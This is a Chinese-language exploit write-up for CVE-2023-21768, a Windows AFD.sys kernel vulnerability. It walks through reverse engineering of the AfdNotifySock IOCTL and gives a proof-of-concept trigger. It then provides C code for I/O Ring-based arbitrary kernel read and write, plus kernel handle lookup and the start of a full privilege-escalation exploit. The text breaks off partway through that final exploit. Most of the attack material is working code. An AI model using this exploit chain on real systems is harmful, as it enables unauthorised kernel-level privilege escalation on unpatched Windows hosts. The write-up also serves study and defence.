一
简介
二
环境搭建
◆Windows 11 22H2
◆windbg
◆Visual Studio 2022
三
漏洞原理
AFD.sys是Windows操作系统中的一个系统文件,是关于网络协议的文件,主要负责Winsock核心服务的实现和运行。Winsock是Windows下网络协议的一个API,通过它应用程序可以访问网络,AFD.sys则是其中实现的核心服务。具体来说,它提供了以下功能:
1. 网络数据的传输和接收;
2. 网络套接字的创建、连接、监听等操作;
3. 实现了对TCP/IP和UDP/IP等网络协议的支持;
4. 管理和维护网络缓存。
简而言之,AFD.sys是Windows网络协议栈的一个核心部分,负责管理和协调网络通信的各项操作。
补丁对比
逆向工程
AfdFastIoDeviceControl-->AfdNotifySock-->AfdNotifyRemoveIoCompletion()。AfdImmediateCallDispatch和AfdIrpCallDispatch,这两个表里面的函数都是AFD驱动程序的调度函数。
AfdImmediateCallDispatch进行交叉引用,我们将在AfdFastIoDeviceControl()函数中看到下面的代码,实际上对AfdIrpCallDispatch进行交叉引用,也会在其对应的函数看到类似的代码。
AfdIoctlTable去获取自定义的控制信号,前面我们已经知道AfdNotifySock在AfdImmediateCallDispatch表中的下标是73,通过下面的图片可以知道对应的控制信号是12127h。
afd!AfdIoctlTable调试
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLL。
#include<Windows.h>
struct IO_STATUS_BLOCK
{
union
{
DWORD Status;
PVOID Pointer;
};
DWORD* Information;
};
struct UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
};
struct OBJECT_ATTRIBUTES
{
ULONG Length;
HANDLE RootDirectory;
UNICODE_STRING* ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
};
DWORD(WINAPI* NtDeviceIoControlFile)(HANDLE FileHandle, HANDLE Event, VOID* ApcRoutine, PVOID ApcContext, IO_STATUS_BLOCK* IoStatusBlock, ULONG IoControlCode, PVOID InputBuffer, ULONG InputBufferLength, PVOID OutputBuffer, ULONG OutputBufferLength);
DWORD(WINAPI* NtCreateFile)(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, OBJECT_ATTRIBUTES* ObjectAttributes, IO_STATUS_BLOCK* IoStatusBlock, LARGE_INTEGER* AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);
#define AFD_NOTIFYSOCK_IOCTL 0x12127
int main()
{
// get NtDeviceIoControlFile function ptr
NtDeviceIoControlFile = (unsigned long(__stdcall*)(void*, void*, void*, void*, struct IO_STATUS_BLOCK*, unsigned long, void*, unsigned long, void*, unsigned long))GetProcAddress(GetModuleHandle("ntdll.dll"), "NtDeviceIoControlFile");
if (NtDeviceIoControlFile == NULL)
{
return 1;
}
// get NtCreateFile function ptr
NtCreateFile = (unsigned long(__stdcall*)(void**, unsigned long, struct OBJECT_ATTRIBUTES*, struct IO_STATUS_BLOCK*, union _LARGE_INTEGER*, unsigned long, unsigned long, unsigned long, unsigned long, void*, unsigned long))GetProcAddress(GetModuleHandle("ntdll.dll"), "NtCreateFile");
if (NtCreateFile == NULL)
{
return 1;
}
IO_STATUS_BLOCK IoStatusBlock;
HANDLE hEvent = NULL;
HANDLE hSocket = NULL;
OBJECT_ATTRIBUTES ObjectAttributes;
UNICODE_STRING ObjectFilePath;
DWORD dwStatus = 0;
BYTE bExtendedAttributes[] =
{
0x00, 0x00, 0x00, 0x00, 0x00, 0x0F, 0x1E, 0x00, 0x41, 0x66, 0x64, 0x4F, 0x70, 0x65, 0x6E, 0x50,
0x61, 0x63, 0x6B, 0x65, 0x74, 0x58, 0x58, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x02, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x60, 0xEF, 0x3D, 0x47, 0xFE
};
char Data[0x30] = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLL";
// create status event
hEvent = CreateEvent(NULL, 0, 0, NULL);
if (hEvent == NULL)
{
// error
return 1;
}
// set afd endpoint path
memset((void*)&ObjectFilePath, 0, sizeof(ObjectFilePath));
ObjectFilePath.Buffer = (PWSTR)L"\Device\Afd\Endpoint";
ObjectFilePath.Length = wcslen(ObjectFilePath.Buffer) * sizeof(wchar_t);
ObjectFilePath.MaximumLength = ObjectFilePath.Length;
// initialise object attributes
memset((void*)&ObjectAttributes, 0, sizeof(ObjectAttributes));
ObjectAttributes.Length = sizeof(ObjectAttributes);
ObjectAttributes.ObjectName = &ObjectFilePath;
ObjectAttributes.Attributes = 0x40;
// create socket handle
IoStatusBlock.Status = 0;
IoStatusBlock.Information = NULL;
dwStatus = NtCreateFile(&hSocket, MAXIMUM_ALLOWED, &ObjectAttributes, &IoStatusBlock, NULL, 0, FILE_SHARE_READ | FILE_SHARE_WRITE, 1, 0, bExtendedAttributes, sizeof(bExtendedAttributes));
if (dwStatus != 0)
{
// error
CloseHandle(hEvent);
return 1;
}
/*
__kernel_entry NTSYSCALLAPI NTSTATUS NtDeviceIoControlFile(
[in] HANDLE FileHandle,
[in, optional] HANDLE Event,
[in, optional] PIO_APC_ROUTINE ApcRoutine,
[in, optional] PVOID ApcContext,
[out] PIO_STATUS_BLOCK IoStatusBlock,
[in] ULONG IoControlCode,
[in, optional] PVOID InputBuffer,
[in] ULONG InputBufferLength,
[out, optional] PVOID OutputBuffer,
[in] ULONG OutputBufferLength
);
*/
NtDeviceIoControlFile(hSocket, hEvent, NULL, NULL, &IoStatusBlock, AFD_NOTIFYSOCK_IOCTL, &Data, 0x30, NULL, 0);
if (INVALID_HANDLE_VALUE != hSocket)
{
CloseHandle(hSocket);
}
if (NULL != hEvent)
{
CloseHandle(hEvent);
}
}
afd!AfdNotifySock打上断点,断下来,r9寄存器指向我们的输入。
if ( InputBufferLength != 0x30 || OutputBufferLength )
{
v10 = 0xC0000004;
goto LABEL_45; // bad
}
if ( OutputBuffer )
goto LABEL_5; // bad
◆InputBufferLength == 0x30
◆OutputBufferLength==0
◆OutputBuffer==0
InputBuffer的一些值进行了判断,并且将*(void **)_InputBuffer传入了ObReferenceObjectByHandle()函数。
if ( !*(_DWORD *)(*(_QWORD *)&_InputBuffer + 32i64) )
goto bad1;
if ( *(_DWORD *)(*(_QWORD *)&_InputBuffer + 0x28i64) )
{
if ( !*(_QWORD *)(*(_QWORD *)&_InputBuffer + 24i64) || !*(_QWORD *)(*(_QWORD *)&_InputBuffer + 16i64) )
goto bad1;
}
else if ( *(_QWORD *)(*(_QWORD *)&_InputBuffer + 16i64) || *(_DWORD *)(*(_QWORD *)&_InputBuffer + 36i64) )
{
bad1:
ret = 0xC000000D;
goto bad;
}
typedef struct AFD_NOTIFYSOCK_DATA
{
HANDLE HandleIoCompletion;
PVOID pData1;
PVOID pData2;
PVOID pPwnPtr;
DWORD dwCounter;
DWORD dwTimeout;
DWORD dwLen;
char lol[0x4];
}AFD_NOTIFYSOCK_DATA;
ObReferenceObjectByHandle(),其返回值必须>=0,这里可以去问问chatGPT,大部分情况下,可以提供非常有效的帮助。问:如果第三个参数是IoCompletionObjectType呢 这个对象类型的句柄可以调用什么函数来创建
答:IO完成对象是Windows内核中的一种同步机制,它用于通知应用程序有关操作完成的消息。IO完成对象是由操作系统内核自动创建和管理的,因此没有专门的函数来创建它们。在Windows操作系统中,可以使用CreateIoCompletionPort函数将IO完成端口与文件句柄关联,从而将IO操作通知到IO完成对象中。关联之后,可以使用GetQueuedCompletionStatus函数等待IO完成对象,以获取IO操作完成的状态和相关数据。因此,IO完成对象的句柄实际上是IO完成端口的句柄,可以使用CreateIoCompletionPort函数创建。
CreateIoCompletionPort是Win32 API之一,底层实现是由Windows内核的NTOSKRNL.EXE模块提供支持,具体实现可参考Windows Driver Kit(WDK)提供的内核模式驱动开发文档。其底层函数是NtCreateIoCompletion,该函数是内核发起IO请求的函数之一,用于创建IO完成端口对象并返回其句柄。它的定义如下:
```C
NTSYSAPI
NTSTATUS
NTAPI
NtCreateIoCompletion(
_Out_ PHANDLE IoCompletionHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ ULONG NumberOfConcurrentThreads
);
```
其中,
- IoCompletionHandle:用于返回IO完成端口对象的句柄。
- DesiredAccess:指定IO完成端口对象的访问权限。
- ObjectAttributes:用于指定IO完成端口对象的名称及其属性。
- NumberOfConcurrentThreads:指定IO请求的并发线程数。
ObReferenceObjectByHandle()。InputBuffer->pData1满足一些条件。
◆Data.pData1 = VirtualAlloc(NULL, 0x2000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
◆Data.dwCounter = 0x1;
AfdNotifyRemoveIoCompletion()了,其参数是一个数,IoCompletionObject,InputBuffer,目前我们的Data如下,Data.pData2 还未出现,4byte,目前来说不为空即可,但是根据结构体的定义,将其设置为一个地址。Data.HandleIoCompletion = hCompletion;
Data.pData1 = VirtualAlloc(NULL, 0x2000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
Data.pData2 = &test; //一个地址
Data.dwCounter = 0x1;
Data.dwLen = 0x1;
Data.pPwnPtr = &test;
afd!AfdNotifyRemoveIoCompletion调试
AfdNotifyRemoveIoCompletion(),看看需要绕过那些检测,从而到达漏洞点。
◆InputBuffer->dwLen!=0
◆InputBuffer->pData2指向一块内存空间,可写
IoRemoveIoCompletion函数,想要到到达漏洞点,貌似我们需要让其返回STATUS_SUCCESS(0)。
IoRemoveIoCompletion其介绍如下:`IoRemoveIoCompletion`是Windows Driver Kit(WDK)提供的函数,用于将已完成的I/O操作从I/O完成端口的完成队列中移除并返回。
该函数的原型如下:
```c
NTSTATUS IoRemoveIoCompletion(
HANDLE CompletionPortHandle,
PVOID *KeyContext,
PVOID *ApcContext,
PIO_STATUS_BLOCK IoStatusBlock,
PLARGE_INTEGER Timeout
);
```
其中,参数的含义如下:
- `CompletionPortHandle`:对应I/O完成端口的句柄。
- `KeyContext`:指向指针的指针,用于获取与已完成I/O操作相关联的关键上下文。
- `ApcContext`:指向指针的指针,用于获取与已完成I/O操作相关联的应用程序上下文。
- `IoStatusBlock`:指向`IO_STATUS_BLOCK`结构的指针,用于获取已完成I/O操作的状态信息。
- `Timeout`:可选参数,指向`LARGE_INTEGER`结构的指针,用于指定函数等待的超时时间。如果为`NULL`,函数将不会等待,并立即返回。
该函数用于从I/O完成端口的完成队列中删除已完成的I/O操作并获取相关信息,以便驱动程序进行后续处理,例如通知相关进程/线程或启动下一轮I/O操作。
需要注意的是,I/O完成端口及其相关的函数和结构体只适用于Windows操作系统。如果您在使用其他操作系统,可能需要查找其他方法来管理已完成的I/O操作。
问:如何向I/O完成端口的完成队列中添加已完成的I/O操作,有那些函数
答:
在Windows平台下,如果您想要向I/O完成端口的完成队列中添加已完成的I/O操作,您可以使用以下函数:
1. `NtSetIoCompletion`:该函数是Windows系统调用之一,可将已完成的I/O操作添加到指定的I/O完成端口的完成队列中。该函数适用于用户模式程序使用的I/O完整端口。
2. `IoSetIoCompletion`:该函数是Windows驱动程序开发包(WDK)中的一部分,与`NtSetIoCompletion`函数相似。驱动程序可以使用该函数将I/O操作添加到指定的I/O完成端口的完成队列中。该函数适用于驱动程序中使用的I/O完整端口。
这两个函数的作用类似,它们都用于将已完成的I/O操作添加到指定的I/O完成端口的完成队列中。这些函数调用后,I/O管理器将在IRP的调用线程上调用已完成I/O请求的完成例程。
需要注意的是,I/O完成端口及其相关的函数和结构体只适用于Windows操作系统。如果您在使用其他操作系统,可能需要查找其他方法来管理已完成的I/O操作。
NtSetIoCompletion 是 Windows 操作系统内核中的一个函数,用于向 I/O 完成端口的完成队列中添加一个 I/O 完成包。该函数通常在内核模式下使用,用于驱动程序或其他内核组件实现异步 I/O 操作。
NtSetIoCompletion 函数的原型如下:
scss
Copy code
NTSTATUS NtSetIoCompletion(
HANDLE CompletionPortHandle,
ULONG_PTR CompletionKey,
PVOID CompletionContext,
NTSTATUS Status,
ULONG_PTR Information
);
该函数的输入参数包括:
CompletionPortHandle:I/O 完成端口的句柄。
CompletionKey:一个与已完成的 I/O 操作相关联的键值,由驱动程序在创建完成端口时指定。
CompletionContext:一个指向完成操作的上下文数据结构的指针,包含有关已完成的 I/O 操作的信息。
Status:已完成操作的状态,通常是一个 NTSTATUS 类型的值。
Information:与已完成的 I/O 操作相关的信息,通常是一个 ULONG_PTR 类型的值。
NtSetIoCompletion 函数的返回值是 NTSTATUS 类型的错误代码,如果操作成功完成,则返回 STATUS_SUCCESS。
使用 NtSetIoCompletion 函数将完成包添加到 I/O 完成端口的完成队列中后,可以使用 IoRemoveIoCompletion 函数从队列中取出完成包并处理已完成的 I/O 操作。这种机制使得驱动程序或其他内核组件能够实现异步 I/O 操作,从而提高系统的响应速度和性能。
NtCreateIoCompletion(&hCompletion, MAXIMUM_ALLOWED, NULL, 1);
NtSetIoCompletion(hCompletion, 0, &IoStatusBlock, 0, 0x100);
Data.HandleIoCompletion = hCompletion;
Data.pData1 = VirtualAlloc(NULL, 0x2000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
Data.pData2 = VirtualAlloc(NULL, 0x2000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
Data.dwCounter = 0x1;
Data.dwLen = 0x1;
Data.dwTimeout = 1000;
Data.pPwnPtr = &test;
IoRemoveIoCompletion
afd!AfdNotifyRemoveIoCompletion的分析来看,貌似writevalue是由IoRemoveIoCompletion这个函数来决定的,所以我们需要对这个函数进行分析。
四
后渗透原语技术I/O Ring
I/O Ring
◆IORING_OP_READ:将文件中的数据读入输出缓冲区。对应BuildIoRingReadFile()函数。
◆IORING_OP_CANCEL:请求取消文件的挂起操作。对应BuildIoRingCancelRequest()函数。
◆IORING_OP_REGISTER_FILES:请求文件句柄的预注册以便稍后处理。对应BuildIoRingRegisterFileHandles()函数。
◆IORING_OP_REGISTER_BUFFERS:请求为要读入的文件数据预注册输出缓冲区。对应BuildIoRingRegisterBuffers()函数。
◆IORING_OP_WRITE:将输出缓冲区的数据写入文件。对应BuildIoRingWriteFile()函数。
◆IORING_OP_FLUSH: 刷新操作。对应BuildIoRingFlushFile()函数。
预注册输出缓冲区文件读写-normal
◆将文件内容读取到预注册缓冲区,读取abc
◆将预注册缓冲区写到文件中,写入ABC
◆CreateIoRing创建IORING
◆BuildIoRingRegisterBuffers()申请了2个缓冲区,可通过IoRingBufferRefFromIndexAndOffset的第一个参数来决定用哪一个。
◆BuildIoRingReadFile(),读文件中的abc。
◆BuildIoRingWriteFile(),向文件中偏移为3的位置写ABC。
#include <ntstatus.h>
#define WIN32_NO_STATUS
#include <Windows.h>
#include <cstdio>
#include <ioringapi.h>
#include <winternl.h>
#include <time.h>
#include <intrin.h>
HIORING handle = NULL;
void RegisterBuffersfileReadWrite()
{
HRESULT result;
IORING_CREATE_FLAGS flags;
IORING_BUFFER_INFO *buffers;
unsigned int count=2;
UINT32 submittedEntries;
//创建一个IORING
flags.Required = IORING_CREATE_REQUIRED_FLAGS_NONE;
flags.Advisory = IORING_CREATE_ADVISORY_FLAGS_NONE;
result = CreateIoRing(IORING_VERSION_3, flags, 0x10000, 0x20000, &handle);
if (!SUCCEEDED(result))
{
printf("Failed creating IO ring handle: 0x%xn", result);
return;
}
//预注册输出缓冲区,两个
buffers=(IORING_BUFFER_INFO*)VirtualAlloc(NULL, sizeof(IORING_BUFFER_INFO) * count, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
buffers[0].Address = (void*)VirtualAlloc(NULL, 0x20, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
buffers[0].Length = 0x20;
buffers[1].Address = (void*)VirtualAlloc(NULL, 0x10, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
memcpy(buffers[1].Address, "ABC", 0x3);
buffers[1].Length = 0x10;
BuildIoRingRegisterBuffers(handle,2, buffers, 0);
//获取文件句柄
HANDLE hFile = CreateFile("C:\Users\25077\Desktop\test\ioRing.txt", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
printf("Failed to open file. Error code: %dn", GetLastError());
return;
}
IORING_HANDLE_REF requestDataFile=IoRingHandleRefFromHandle(hFile);
//用第一个来读
IORING_BUFFER_REF requestDataBuffer = IoRingBufferRefFromIndexAndOffset(0, 0);
result = BuildIoRingReadFile(handle,requestDataFile, requestDataBuffer, 0x10, 0,NULL, IOSQE_FLAGS_NONE);
if (!SUCCEEDED(result))
{
printf("Failed building IO ring read file structure: 0x%xn", result);
return;
}
//用第二个来写
requestDataBuffer = IoRingBufferRefFromIndexAndOffset(1, 0);
result = BuildIoRingWriteFile(handle, requestDataFile, requestDataBuffer, 0x10, 0x3, FILE_WRITE_FLAGS_NONE, NULL, IOSQE_FLAGS_NONE);
if (!SUCCEEDED(result))
{
printf("Failed building IO ring Write file structure: 0x%xn", result);
return;
}
//提交
result = SubmitIoRing(handle, 0, 0, 0);
if (!SUCCEEDED(result))
{
printf("Failed submitting IO ring: 0x%xn", result);
return;
}
//打印读取到的数据
printf("%s", buffers[0].Address);
if (handle != NULL)
{
CloseIoRing(handle);
}
if (hFile)
{
CloseHandle(hFile);
}
VirtualFree(buffers[0].Address, 0x20, MEM_RELEASE);
VirtualFree(buffers[1].Address, 0x10, MEM_RELEASE);
}
int main()
{
RegisterBuffersfileReadWrite();
}
预注册输出缓冲区文件读写-unusual
typedef struct _IORING_OBJECT
{
USHORT Type; // 结构体类型
USHORT Size; // 结构体大小
NT_IORING_INFO UserInfo; // 包含IO环信息的结构体,包括IO环的大小、版本、队列大小等详细信息
PVOID Section; // 内存映射文件Section对象的指针
PNT_IORING_SUBMISSION_QUEUE SubmissionQueue;// 存储IO请求的Submission Queue的指针
PMDL CompletionQueueMdl; // 缓存Completion Queue的MDL的指针
PNT_IORING_COMPLETION_QUEUE CompletionQueue;// 存储IO请求完成状态的Completion Queue的指针
ULONG64 ViewSize; // 映射视图的大小
ULONG InSubmit; // IO请求的数量
ULONG64 CompletionLock; // 保护计数器的锁,在读取CQring时使用
ULONG64 SubmitCount; // 已提交IO请求SQEs的数量
ULONG64 CompletionCount; // 已完成的IO请求数量
ULONG64 CompletionWaitUntil; // 等待完成IO请求的时间,当完成请求缓存区被解锁时使用
KEVENT CompletionEvent; // 内核事件,在IO请求完成时发出
UCHAR SignalCompletionEvent; // 是否使用信号量发出完成事件的标志
PKEVENT CompletionUserEvent; // 一个与CompletionEvent成分的用户事件。用户可以使用此事件来通知一个或多个等待线程,IO请求已完成。
ULONG RegBuffersCount; // 注册的缓冲区数量
PVOID RegBuffers; // 已注册的缓冲区列表的指针
ULONG RegFilesCount; // (异步)读取操作所涉及的文件句柄的数量
PVOID* RegFiles; // (异步)读取操作所涉及的文件句柄列表的指针
} IORING_OBJECT, *PIORING_OBJECT;
typedef struct _HIORING
{
HANDLE handle; // IO环操作对象的句柄
NT_IORING_INFO Info; // 包含IO环信息的结构体,包括IO环的大小、版本、队列大小等详细信息
ULONG IoRingKernelAcceptedVersion; // 内核支持的IO环版本号
PVOID RegBufferArray; // 注册缓冲区的指针,用于注册IO缓冲区
ULONG BufferArraySize; // 注册缓冲区的大小
PVOID Unknown; // 未知指针,可能提供额外的信息
ULONG FileHandlesCount; // IO环管理的文件句柄数量
ULONG SubQueueHead; // IO环子队列的头部索引
ULONG SubQueueTail; // IO环子队列的尾部索引
} _HIORING;
◆_IORING_OBJECT中的RegBuffers和RegBuffersCount
◆_HIORING的RegBufferArray和BufferArraySize
typedef struct _IOP_MC_BUFFER_ENTRY
{
USHORT Type; // 结构体类型
USHORT Reserved; // 保留字段
ULONG Size; // 结构体大小
ULONG ReferenceCount; // 结构体引用计数
ULONG Flags; // 标志位
LIST_ENTRY GlobalDataLink; // 全局数据链接列表
PVOID Address; // 缓冲区的地址
ULONG Length; // 缓冲区的长度
CHAR AccessMode; // 缓冲区的访问模式
ULONG MdlRef; // 缓冲区的MDL引用数
PMDL Mdl; // 缓冲区的MDL
KEVENT MdlRundownEvent; // 缓冲区的MDL结束事件
PULONG64 PfnArray; // 物理页帧号数组的指针
IOP_MC_BE_PAGE_NODE PageNodes[1]; // 物理页节点数组
} IOP_MC_BUFFER_ENTRY, *PIOP_MC_BUFFER_ENTRY;
mcBufferEntry->Address = TargetAddress;
mcBufferEntry->Length = Length;
mcBufferEntry->Type = 0xc02;
mcBufferEntry->Size = 0x80; // 0x20 * (numberOfPagesInBuffer + 3)
mcBufferEntry->AccessMode = 1;
mcBufferEntry->ReferenceCount = 1;
任意地址写
◆先将value写入到文件中,WriteFile()
◆设置好要写的内核地址TargetAddress
◆调用BuildIoRingReadFile(),读取文件内容到缓冲区,也就是TargetAddress
任意地址读
◆设置好要读的内核地址TargetAddress
◆调用BuildIoRingWriteFile,将TargetAddress的值写入到文件
◆ReadFile读取文件里面的值
五
Exp编写
内核句柄查找
1.定义一个PSYSTEM_HANDLE_INFORMATION结构体指针pHandleInfo,用于存储从系统中查询到的句柄信息。
2.使用NtQuerySystemInformation函数查询系统句柄信息,如果查询结果长度不足,则重新分配内存空间并继续查询,直到获取到足够的句柄信息为止。
3.遍历句柄信息,找到指定进程ID和句柄值所对应的句柄信息,从而获取到内核对象地址,并将其存储到ppObjAddr指针所指向的内存中。
4.如果找到了对应的句柄信息,则返回0表示操作成功;否则返回其他错误代码。
5.释放之前分配的内存空间。
int getobjptr(PULONG64 ppObjAddr, ULONG ulPid, HANDLE handle)
{
int ret = -1;
PSYSTEM_HANDLE_INFORMATION pHandleInfo = NULL;
ULONG ulBytes = 0;
NTSTATUS ntStatus = STATUS_SUCCESS;
while ((ntStatus = NtQuerySystemInformation(SystemHandleInformation, pHandleInfo, ulBytes, &ulBytes)) == STATUS_INFO_LENGTH_MISMATCH)
{
if (pHandleInfo != NULL)
{
pHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, pHandleInfo, 2 * ulBytes);
}
else
{
pHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 2 * ulBytes);
}
}
if (ntStatus != STATUS_SUCCESS)
{
ret = ntStatus;
goto done;
}
for (ULONG i = 0; i < pHandleInfo->NumberOfHandles; i++)
{
if ((pHandleInfo->Handles[i].UniqueProcessId == ulPid) && (pHandleInfo->Handles[i].HandleValue == handle))
{
*ppObjAddr = pHandleInfo->Handles[i].Object;
ret = 0;
break;
}
}
done:
if (NULL != pHandleInfo)
{
HeapFree(GetProcessHeap, 0, pHandleInfo);
}
return ret;
}
初始化
BOOL Init_CVE_2023_21768()
{
_NtCreateFile = (unsigned long(__stdcall*)(PHANDLE, unsigned long, POBJECT_ATTRIBUTES, PIO_STATUS_BLOCK, PLARGE_INTEGER, unsigned long, unsigned long, unsigned long, unsigned long, void*, unsigned long))GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtCreateFile");
_NtDeviceIoControlFile = (unsigned long(__stdcall*)(HANDLE, void*, void*, void*, PIO_STATUS_BLOCK, unsigned long, void*, unsigned long, void*, unsigned long))GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtDeviceIoControlFile");
_NtCreateIoCompletion = (unsigned long(__stdcall*)(PHANDLE, unsigned long, POBJECT_ATTRIBUTES, unsigned long))GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtCreateIoCompletion");
_NtSetIoCompletion = (unsigned long(__stdcall*)(HANDLE, unsigned long, PIO_STATUS_BLOCK, NTSTATUS, unsigned long))GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtSetIoCompletion");
_NtQuerySystemInformation = (unsigned long(__stdcall*)(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG))GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQuerySystemInformation");
if (_NtSetIoCompletion == NULL|| _NtDeviceIoControlFile == NULL|| _NtCreateFile == NULL|| _NtCreateIoCompletion == NULL)
{
printf("get function false ");
return FALSE;
}
ioring_init(&pIoRing);
File_init();
FakeRegisterBuffers_init();
TokenAddr_init();
}
任意地址写
int ioring_write(PULONG64 pRegisterBuffers, ULONG64 pWriteAddr, PVOID pWriteBuffer, ULONG ulWriteLen)
{
int ret = -1;
PIOP_MC_BUFFER_ENTRY pMcBufferEntry = NULL;
IORING_HANDLE_REF reqFile = IoRingHandleRefFromHandle(hInPipeClient);
IORING_BUFFER_REF reqBuffer = IoRingBufferRefFromIndexAndOffset(0, 0);
IORING_CQE cqe = { 0 };
if (0 == WriteFile(hInPipe, pWriteBuffer, ulWriteLen, NULL, NULL))
{
ret = GetLastError();
goto done;
}
pMcBufferEntry = (PIOP_MC_BUFFER_ENTRY)VirtualAlloc(NULL, sizeof(IOP_MC_BUFFER_ENTRY), MEM_COMMIT, PAGE_READWRITE);
if (NULL == pMcBufferEntry)
{
ret = GetLastError();
goto done;
}
pMcBufferEntry->Address = (PVOID)pWriteAddr;
pMcBufferEntry->Length = ulWriteLen;
pMcBufferEntry->Type = 0xc02;
pMcBufferEntry->Size = 0x80;
pMcBufferEntry->AccessMode = 1;
pMcBufferEntry->ReferenceCount = 1;
pRegisterBuffers[0] = (ULONG64)pMcBufferEntry;
ret = BuildIoRingReadFile(hIoRing, reqFile, reqBuffer, ulWriteLen, 0, NULL, IOSQE_FLAGS_NONE);
if (0 != ret)
{
goto done;
}
ret = SubmitIoRing(hIoRing, 0, 0, NULL);
if (0 != ret)
{
goto done;
}
ret = PopIoRingCompletion(hIoRing, &cqe);
if (0 != ret)
{
goto done;
}
if (0 != cqe.ResultCode)
{
ret = cqe.ResultCode;
goto done;
}
ret = 0;
done:
if (NULL != pMcBufferEntry)
{
VirtualFree(pMcBufferEntry, sizeof(IOP_MC_BUFFER_ENTRY), MEM_RELEASE);
}
return ret;
}
任意地址读
int ioring_read(PULONG64 pRegisterBuffers, ULONG64 pReadAddr, PVOID pReadBuffer, ULONG ulReadLen)
{
int ret = -1;
PIOP_MC_BUFFER_ENTRY pMcBufferEntry = NULL;
IORING_HANDLE_REF reqFile = IoRingHandleRefFromHandle(hOutPipeClient);
IORING_BUFFER_REF reqBuffer = IoRingBufferRefFromIndexAndOffset(0, 0);
IORING_CQE cqe = { 0 };
pMcBufferEntry = (PIOP_MC_BUFFER_ENTRY)VirtualAlloc(NULL, sizeof(IOP_MC_BUFFER_ENTRY), MEM_COMMIT, PAGE_READWRITE);
if (NULL == pMcBufferEntry)
{
ret = GetLastError();
goto done;
}
pMcBufferEntry->Address = (PVOID)pReadAddr;
pMcBufferEntry->Length = ulReadLen;
pMcBufferEntry->Type = 0xc02;
pMcBufferEntry->Size = 0x80;
pMcBufferEntry->AccessMode = 1;
pMcBufferEntry->ReferenceCount = 1;
pRegisterBuffers[0] = (ULONG64)pMcBufferEntry;
ret = BuildIoRingWriteFile(hIoRing, reqFile, reqBuffer, ulReadLen, 0, FILE_WRITE_FLAGS_NONE, NULL, IOSQE_FLAGS_NONE);
if (0 != ret)
{
goto done;
}
ret = SubmitIoRing(hIoRing, 0, 0, NULL);
if (0 != ret)
{
goto done;
}
ret = PopIoRingCompletion(hIoRing, &cqe);
if (0 != ret)
{
goto done;
}
if (0 != cqe.ResultCode)
{
ret = cqe.ResultCode;
goto done;
}
if (0 == ReadFile(hOutPipe, pReadBuffer, ulReadLen, NULL, NULL))
{
ret = GetLastError();
goto done;
}
ret = 0;
done:
if (NULL != pMcBufferEntry)
{
VirtualFree(pMcBufferEntry, sizeof(IOP_MC_BUFFER_ENTRY), MEM_RELEASE);
}
return ret;
}
总Exploit
#include <iostream>
#include <windows.h>
#include <ioringapi.h>
#include <ntstatus.h>
#include <winternl.h>
#include "structs.h"
#include "win_defs.h"
DWORD(WINAPI* _NtCreateFile)(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);
DWORD(WINAPI* _NtDeviceIoControlFile)(HANDLE FileHandle, HANDLE Event, VOID* ApcRoutine, PVOID ApcContext, PIO_STATUS_BLOCK IoStatusBlock, ULONG IoControlCode, PVOID InputBuffer, ULONG InputBufferLength, PVOID OutputBuffer, ULONG OutputBufferLength);
DWORD(WINAPI* _NtCreateIoCompletion)(PHANDLE IoCompletionHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, ULONG NumberOfConcurrentThreads);
DWORD(WINAPI* _NtSetIoCompletion)(HANDLE IoCompletionHandle, ULONG CompletionKey, PIO_STATUS_BLOCK IoStatusBlock, NTSTATUS CompletionStatus, ULONG NumberOfBytesTransferred);
DWORD(WINAPI* _NtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
#define AFD_NOTIFYSOCK_IOCTL 0x12127
#define EPROC_TOKEN_OFFSET 0x4b8
namespace CVE_2023_21768
{
HIORING hIoRing = NULL;
PIORING_OBJECT pIoRing = NULL;
HANDLE hInPipe = INVALID_HANDLE_VALUE;
HANDLE hOutPipe = INVALID_HANDLE_VALUE;
HANDLE hInPipeClient = INVALID_HANDLE_VALUE;
HANDLE hOutPipeClient = INVALID_HANDLE_VALUE;
DWORD64 FakeRegBufferAddr = 0x1000000;
PVOID pFakeRegBuffers = NULL;
